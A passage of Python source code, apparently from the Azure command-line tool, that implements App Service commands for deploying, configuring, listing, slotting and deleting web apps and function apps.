new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['content-type'] = 'application/octet-stream'
import requests
import os
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
requests.post(zip_url, data=zip_content, headers=headers)
# check the status of async deployment
response = _check_zip_deployment_status(deployment_status_url, authorization, timeout)
return response
def get_sku_name(tier): # pylint: disable=too-many-return-statements
tier = tier.upper()
if tier == 'F1' or tier == "FREE":
return 'FREE'
elif tier == 'D1' or tier == "SHARED":
return 'SHARED'
elif tier in ['B1', 'B2', 'B3', 'BASIC']:
return 'BASIC'
elif tier in ['S1', 'S2', 'S3']:
return 'STANDARD'
elif tier in ['P1', 'P2', 'P3']:
return 'PREMIUM'
elif tier in ['P1V2', 'P2V2', 'P3V2']:
return 'PREMIUMV2'
elif tier in ['PC2', 'PC3', 'PC4']:
return 'PremiumContainer'
elif tier in ['EP1', 'EP2', 'EP3']:
return 'ElasticPremium'
else:
raise CLIError("Invalid sku(pricing tier), please refer to command help for valid values")
def _generic_settings_operation(cli_ctx, resource_group_name, name, operation_name,
setting_properties, slot=None, client=None):
client = client or web_client_factory(cli_ctx)
operation = getattr(client.web_apps, operation_name if slot is None else operation_name + '_slot')
if slot is None:
return operation(resource_group_name, name, str, setting_properties)
return operation(resource_group_name, name, slot, str, setting_properties)
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
webapp = app_instance
if not app_instance: # when the routine is invoked as a help method, not through commands
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
_rename_server_farm_props(webapp)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
return webapp
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.create_or_update_slot if slot else client.web_apps.create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance,
skip_dns_registration=skip_dns_registration,
skip_custom_domain_verification=skip_custom_domain_verification,
force_dns_registration=force_dns_registration,
ttl_in_seconds=ttl_in_seconds)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
if 'function' not in instance.kind:
raise CLIError('Not a function app to update')
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.create_or_update(resource_group_name, name, site_envelope=instance)
def list_webapp(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' not in r.kind]
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restore_from_deleted_app', slot, request)
def list_function_app(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' in r.kind]
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
result = list(client.deleted_web_apps.list())
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def assign_identity(cmd, resource_group_name, name, role='Contributor', slot=None, scope=None):
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
webapp.identity = ManagedServiceIdentity(type='SystemAssigned')
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot).identity
def remove_identity(cmd, resource_group_name, name, slot=None):
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
webapp.identity = ManagedServiceIdentity(type='None')
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
print(arg, values[arg])
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(client, linux)
return [s['displayName'] for s in runtime_helper.stacks]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
linux_fx = fx_version if web_app.reserved else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any([linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES]):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
# Decode base64 encoded byte array into string
return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
def update_site_configs(cmd, resource_group_name, name, slot=None,
linux_fx_version=None, windows_fx_version=None, php_version=None, python_version=None, # pylint: disable=unused-argument
net_framework_version=None, # pylint: disable=unused-argument
java_version=None, java_container=None, java_container_version=None, # pylint: disable=unused-argument
remote_debugging_enabled=None, web_sockets_enabled=None, # pylint: disable=unused-argument
always_on=None, auto_heal_enabled=None, # pylint: disable=unused-argument
use32_bit_worker_process=None, # pylint: disable=unused-argument
min_tls_version=None, # pylint: disable=unused-argument
http20_enabled=None, # pylint: disable=unused-argument
app_command_line=None, # pylint: disable=unused-argument
ftps_state=None, # pylint: disable=unused-argument
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
result = {}
for s in generic_configurations:
try:
result.update(get_json_object(s))
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
setattr(configs, config_name, value)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
return result.properties
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
if value[0] in ["'", '"']: # strip away the quots used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(location=webapp.location, site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name, webapp.name, hostname, binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name, webapp.name, hostname, binding,
slot)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
# logics here are ported from portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
clone_from_prod = None
slot_def.site_config = SiteConfig()
poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
if configuration_source:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings.properties, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings.properties, slot, client)
result.name = result.name.split('/')[-1]
return result
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, cd_app_type=None,
app_working_dir=None, nodejs_task_runner=None, python_framework=None,
python_version=None, cd_account_create=None, cd_project_url=None, test=None,
slot_swap=None, private_repo_username=None, private_repo_password=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
if cd_project_url:
# Add default values
cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type
python_framework = 'Django' if python_framework is None else python_framework
python_version = 'Python 3.5.3 x86' if python_version is None else python_version
webapp_list = None if test is None else list_webapp(resource_group_name)
vsts_provider = VstsContinuousDeliveryProvider()
cd_app_type_details = {
'cd_app_type': cd_app_type,
'app_working_dir': app_working_dir,
'nodejs_task_runner': nodejs_task_runner,
'python_framework': python_framework,
'python_version': python_version
}
try:
status = vsts_provider.setup_continuous_delivery(cmd.cli_ctx, resource_group_name, name, repo_url,
branch, git_token, slot_swap, cd_app_type_details,
cd_project_url, cd_account_create, location, test,
private_repo_username, private_repo_password, webapp_list)
except RuntimeError as ex:
raise CLIError(ex)
logger.warning(status.status_message)
return status
else:
non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework,
python_version, cd_account_create, test, slot_swap]
if any(non_vsts_params):
raise CLIError('Following parameters are of no use when cd_project_url is None: ' +
'cd_app_type, app_working_dir, nodejs_task_runner, python_framework,' +
'python_version, cd_account_create, test, slot_swap')
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
# for non server errors(50x), just throw; otherwise retry 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
Update source control token cached in Azure app service. If no token is provided,
the command will clean up existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
